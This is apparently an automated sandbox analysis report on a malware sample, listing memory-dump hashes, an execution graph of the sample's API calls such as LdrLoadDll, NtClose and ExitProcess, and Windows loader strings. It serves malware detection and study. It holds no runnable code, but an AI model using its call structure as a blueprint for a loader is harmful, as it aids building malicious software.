                                                        • Instruction Fuzzy Hash: E0E0ECB0805308EFC715DFA4D505A9DBF75AB49311F5081A9E80426250CB315A90EF95
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 638d62a06dd51e778084d0811dd0c1382e7540de2b537c316375296915fde242
                                                        • Instruction ID: 72da8f8b656c2e8229103a8b4fee1e6b6a7672e9687df54c943ead9023046858
                                                        • Opcode Fuzzy Hash: 638d62a06dd51e778084d0811dd0c1382e7540de2b537c316375296915fde242
                                                        • Instruction Fuzzy Hash: BAD0A7F284814947C7651BA4686A3E8FF669F5532AF0A9291A84C175938766C412DE04
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 05a96c91d32704b86855d716cd4709b27cd12f69c62b5e98cd3cf2f9c3c441bc
                                                        • Instruction ID: c7859907349aafd5d43c9cbd9b78ee5935925367a408f177f55a5320198c3b25
                                                        • Opcode Fuzzy Hash: 05a96c91d32704b86855d716cd4709b27cd12f69c62b5e98cd3cf2f9c3c441bc
                                                        • Instruction Fuzzy Hash: 04D0C9AA0197809EEB5327B48801846BF71BB63A6430A85D6D4A59A0B3D65054299B22
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a7ae4f629c56f61d88d94b64311647b6f835f7640f24c944f0fef95b8e21a54f
                                                        • Instruction ID: 9350e4be1c28c2a581ee4da1e227f916f875a31a046d67957e68fd830bb909be
                                                        • Opcode Fuzzy Hash: a7ae4f629c56f61d88d94b64311647b6f835f7640f24c944f0fef95b8e21a54f
                                                        • Instruction Fuzzy Hash: 63C02BF6074299DDC3C336F40D00C0C2C21E7217003EC04897104471C7CF108418CE23
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a00cb1bcf87d1797e20b3a0e4ab4aa428f60b6569d5806cebf06d6e91e3c7dea
                                                        • Instruction ID: 4faa3f786db7aa6353f63b26cdd6c848c7cc9aac34eb9791609521b33ef8eb42
                                                        • Opcode Fuzzy Hash: a00cb1bcf87d1797e20b3a0e4ab4aa428f60b6569d5806cebf06d6e91e3c7dea
                                                        • Instruction Fuzzy Hash: 12C08C70040B088BC21177E4E90E728BF68AB08306F458612B00C060608F704050DA51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ec8d8a9aad089ffcc758a3097020c70be6736ee7f929355dce03057ba2add3a7
                                                        • Instruction ID: e4ff620e88f5e50eda00a8297f634d96a09037c170495dada48d100369a7dede
                                                        • Opcode Fuzzy Hash: ec8d8a9aad089ffcc758a3097020c70be6736ee7f929355dce03057ba2add3a7
                                                        • Instruction Fuzzy Hash: 19D002B4D28309CFCB44DF94D5596EDBBB6FB5A302F218115E41AA7280DB74AE52CF40
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 626c1842fafbe0c4d2dd25543a652ab667a5541d4c09ca2f73e9a285768de646
                                                        • Instruction ID: d64cedc10f4f9e51aba9244810850880436c473a4d4b8cc462809ac13b1b9d07
                                                        • Opcode Fuzzy Hash: 626c1842fafbe0c4d2dd25543a652ab667a5541d4c09ca2f73e9a285768de646
                                                        • Instruction Fuzzy Hash: 9EC09B76015104DEC645BF54CDC5C99BAA5FF97B00F85DC52E154850B1CB21C428BF17
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7559a2a79c7bbe19f58adb7643791deb9aa3fdba1aefd7f3d532c4a771973899
                                                        • Instruction ID: f488f974e6475475545dc5b43bc59ad368c9012a2324141efb5f484c03496af8
                                                        • Opcode Fuzzy Hash: 7559a2a79c7bbe19f58adb7643791deb9aa3fdba1aefd7f3d532c4a771973899
                                                        • Instruction Fuzzy Hash: 4CB012E61B4204E5C18937B848C097F6811EBB6700FD09C157745000C08F304435BB1F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:

                                                        Execution Graph

                                                        Execution Coverage:1.1%
                                                        Dynamic/Decrypted Code Coverage:4.5%
                                                        Signature Coverage:8.4%
                                                        Total number of Nodes:155
                                                        Total number of Limit Nodes:13
                                                        execution_graph 92936 4240a3 92937 4240bf 92936->92937 92938 4240e7 92937->92938 92939 4240fb 92937->92939 92940 42b2e3 NtClose 92938->92940 92946 42b2e3 92939->92946 92942 4240f0 92940->92942 92943 424104 92949 42d2d3 RtlAllocateHeap 92943->92949 92945 42410f 92947 42b300 92946->92947 92948 42b311 NtClose 92947->92948 92948->92943 92949->92945 92999 424433 93004 424442 92999->93004 93000 4244cc 93001 424489 93002 42d1b3 RtlFreeHeap 93001->93002 93003 424499 93002->93003 93004->93000 93004->93001 93005 4244c7 93004->93005 93006 42d1b3 RtlFreeHeap 93005->93006 93006->93000 93007 42a8f3 93008 42a90d 93007->93008 93011 1932df0 LdrInitializeThunk 93008->93011 93009 42a935 93011->93009 93012 42e293 93013 42e2a3 93012->93013 93014 42e2a9 93012->93014 93015 42d293 RtlAllocateHeap 93014->93015 93016 42e2cf 93015->93016 92950 41de43 92951 41de69 92950->92951 92955 41df57 92951->92955 92956 42e3c3 92951->92956 92953 41defb 92953->92955 92962 42a943 92953->92962 92957 42e333 92956->92957 92958 42e390 92957->92958 92966 42d293 92957->92966 92958->92953 92960 42e36d 92969 42d1b3 92960->92969 92963 42a960 92962->92963 92978 1932c0a 92963->92978 92964 42a98c 92964->92955 92972 42b5f3 92966->92972 92968 42d2ae 92968->92960 92975 42b643 92969->92975 92971 42d1cc 92971->92958 92973 42b60d 92972->92973 92974 42b61e RtlAllocateHeap 92973->92974 92974->92968 92976 42b65d 92975->92976 92977 42b66e RtlFreeHeap 92976->92977 92977->92971 92979 1932c11 92978->92979 92980 1932c1f LdrInitializeThunk 92978->92980 92979->92964 92980->92964 92981 41ad23 92982 41ad67 92981->92982 92983 42b2e3 NtClose 92982->92983 92984 41ad88 92982->92984 92983->92984 93017 1932b60 LdrInitializeThunk 92985 413cc5 92986 413cdd 92985->92986 92991 4176b3 92986->92991 92988 413cfb 92989 413d2f PostThreadMessageW 92988->92989 92990 413d40 92988->92990 92989->92990 92993 4176cf 92991->92993 92992 4176de 92992->92988 92993->92992 92995 4176fd 92993->92995 92998 
42e673 LdrLoadDll 92993->92998 92996 41772a 92995->92996 92997 417719 LdrLoadDll 92995->92997 92996->92988 92997->92996 92998->92995 93018 401c16 93019 401bc0 93018->93019 93021 401c1f 93018->93021 93023 42e753 93019->93023 93026 42cda3 93023->93026 93027 42cdc9 93026->93027 93038 407113 93027->93038 93029 42cddf 93037 401c0d 93029->93037 93041 41ab33 93029->93041 93031 42cdfe 93032 42ce13 93031->93032 93056 42b693 93031->93056 93052 427373 93032->93052 93035 42ce22 93036 42b693 ExitProcess 93035->93036 93036->93037 93059 4163e3 93038->93059 93040 407120 93040->93029 93042 41ab5f 93041->93042 93070 41aa23 93042->93070 93045 41aba4 93047 41abc0 93045->93047 93050 42b2e3 NtClose 93045->93050 93046 41ab8c 93048 41ab97 93046->93048 93049 42b2e3 NtClose 93046->93049 93047->93031 93048->93031 93049->93048 93051 41abb6 93050->93051 93051->93031 93053 4273cd 93052->93053 93054 4273da 93053->93054 93081 418203 93053->93081 93054->93035 93057 42b6b0 93056->93057 93058 42b6c1 ExitProcess 93057->93058 93058->93032 93060 4163fa 93059->93060 93062 416413 93060->93062 93063 42bd13 93060->93063 93062->93040 93065 42bd2b 93063->93065 93064 42bd4f 93064->93062 93065->93064 93066 42a943 LdrInitializeThunk 93065->93066 93067 42bda4 93066->93067 93068 42d1b3 RtlFreeHeap 93067->93068 93069 42bdbd 93068->93069 93069->93062 93071 41aa3d 93070->93071 93075 41ab19 93070->93075 93076 42a9e3 93071->93076 93074 42b2e3 NtClose 93074->93075 93075->93045 93075->93046 93077 42aa00 93076->93077 93080 19335c0 LdrInitializeThunk 93077->93080 93078 41ab0d 93078->93074 93080->93078 93083 418221 93081->93083 93082 41869b 93082->93054 93083->93082 93089 413df3 93083->93089 93085 41833a 93085->93082 93086 42d1b3 RtlFreeHeap 93085->93086 93087 418352 93086->93087 93087->93082 93088 42b693 ExitProcess 93087->93088 93088->93082 93090 413e12 93089->93090 93091 413f67 93090->93091 93094 413f30 93090->93094 93098 413f26 93090->93098 93100 427513 93090->93100 93091->93085 93093 413f44 93093->93091 93109 41ae43 
RtlFreeHeap LdrInitializeThunk 93093->93109 93094->93091 93108 41ae43 RtlFreeHeap LdrInitializeThunk 93094->93108 93096 413f5d 93096->93085 93105 413843 93098->93105 93101 427570 93100->93101 93102 4275ab 93101->93102 93110 413f73 93101->93110 93102->93090 93104 42758d 93104->93090 93121 42b553 93105->93121 93108->93093 93109->93096 93111 413f29 93110->93111 93114 413f67 93110->93114 93112 413843 LdrInitializeThunk 93111->93112 93113 413f30 93112->93113 93113->93114 93119 41ae43 RtlFreeHeap LdrInitializeThunk 93113->93119 93114->93104 93116 413f44 93116->93114 93120 41ae43 RtlFreeHeap LdrInitializeThunk 93116->93120 93118 413f5d 93118->93104 93119->93116 93120->93118 93122 42b56d 93121->93122 93125 1932c70 LdrInitializeThunk 93122->93125 93123 413865 93123->93094 93125->93123 93126 4188b8 93127 4188bd 93126->93127 93128 42b2e3 NtClose 93127->93128 93129 4188c2 93128->93129

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 246 4176b3-4176dc call 42deb3 250 4176e2-4176f0 call 42e3d3 246->250 251 4176de-4176e1 246->251 254 417700-417711 call 42c873 250->254 255 4176f2-4176fd call 42e673 250->255 260 417713-417727 LdrLoadDll 254->260 261 41772a-41772d 254->261 255->254 260->261
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417725
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_03.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: 972c7fab56d31af967c755d90e9ef108d00ec9d04763406e6b29f8982412051b
                                                        • Instruction ID: 495fad05c013ab4643b5ca0f61915e616880044bf75f2bfe54ee8eab301d4f68
                                                        • Opcode Fuzzy Hash: 972c7fab56d31af967c755d90e9ef108d00ec9d04763406e6b29f8982412051b
                                                        • Instruction Fuzzy Hash: 1F0112B5E4010DBBDB10DAE5DC42FDEB378AB54304F004196E91897281FA75EB54C795

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 292 42b2e3-42b31f call 404623 call 42c373 NtClose
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_03.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_03.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 410-3696$410-3696
                                                        • API String ID: 0-4090662830

                                                        Control-flow Graph

                                                        APIs
                                                        • PostThreadMessageW.USER32(410-3696,00000111,00000000,00000000), ref: 00413D3A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_03.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: 410-3696$410-3696
                                                        • API String ID: 1836367815-4090662830

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 37 413cc5-413cd5 38 413cdd-413d2d call 42dc63 call 4176b3 call 404593 call 424543 37->38 39 413cd8 call 42d253 37->39 50 413d4d-413d53 38->50 51 413d2f-413d3e PostThreadMessageW 38->51 39->38 51->50 52 413d40-413d4a 51->52 52->50
                                                        APIs
                                                        • PostThreadMessageW.USER32(410-3696,00000111,00000000,00000000), ref: 00413D3A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_03.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: 410-3696$410-3696
                                                        • API String ID: 1836367815-4090662830

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 62 42b643-42b684 call 404623 call 42c373 RtlFreeHeap
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B67F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_03.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: adA
                                                        • API String ID: 3298025750-3055462304

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 263 417733-417748 264 41774a-41774d 263->264 265 4176cf-4176dc call 42deb3 263->265 266 417715-417727 LdrLoadDll 264->266 267 41774f 264->267 271 4176e2-4176f0 call 42e3d3 265->271 272 4176de-4176e1 265->272 269 41772a-41772d 266->269 275 417700-417711 call 42c873 271->275 276 4176f2-4176fd call 42e673 271->276 275->269 281 417713-417716 275->281 276->275 282 417719-417727 LdrLoadDll 281->282 282->269
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417725
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_03.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 283 42b5f3-42b634 call 404623 call 42c373 RtlAllocateHeap
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(?,0041DEFB,?,?,00000000,?,0041DEFB,?,?,?), ref: 0042B62F
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_03.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 297 42b693-42b6cf call 404623 call 42c373 ExitProcess
                                                        APIs
                                                        • ExitProcess.KERNEL32(?,00000000,?,?,B55C2B2C,?,?,B55C2B2C), ref: 0042B6CA
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_03.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 288 417752-41777c 289 417719-417727 LdrLoadDll 288->289 290 41777e-41777f 288->290 291 41772a-41772d 289->291
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417725
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_03.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-2160512332
                                                        Strings
                                                        • undeleted critical section in freed memory, xrefs: 0196542B
                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0196540A, 01965496, 01965519
                                                        • Invalid debug info address of this critical section, xrefs: 019654B6
                                                        • double initialized or corrupted critical section, xrefs: 01965508
                                                        • Critical section address, xrefs: 01965425, 019654BC, 01965534
                                                        • Thread identifier, xrefs: 0196553A
                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01965543
                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019654E2
                                                        • 8, xrefs: 019652E3
                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019654CE
                                                        • Address of the debug info found in the active list., xrefs: 019654AE, 019654FA
                                                        • corrupted critical section, xrefs: 019654C2
                                                        • Critical section address., xrefs: 01965502
                                                        • Critical section debug info address, xrefs: 0196541F, 0196552E
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                        • API String ID: 0-2368682639
                                                        Strings
                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01962498
                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01962412
                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01962624
                                                        • @, xrefs: 0196259B
                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01962602
                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0196261F
                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019624C0
                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01962409
                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019622E4
                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01962506
                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019625EB
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                        • API String ID: 0-4009184096
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                        • API String ID: 0-2515994595
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                        • API String ID: 0-1700792311
                                                        Strings
                                                        • AVRF: -*- final list of providers -*- , xrefs: 01978B8F
                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01978A67
                                                        • VerifierDebug, xrefs: 01978CA5
                                                        • VerifierDlls, xrefs: 01978CBD
                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01978A3D
                                                        • HandleTraces, xrefs: 01978C8F
                                                        • VerifierFlags, xrefs: 01978C50
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                        • API String ID: 0-3223716464
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                        • API String ID: 0-1109411897
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-792281065
                                                        Strings
                                                        • apphelp.dll, xrefs: 018E6496
                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 019499ED
                                                        • LdrpInitShimEngine, xrefs: 019499F4, 01949A07, 01949A30
                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01949A2A
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01949A11, 01949A3A
                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01949A01
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
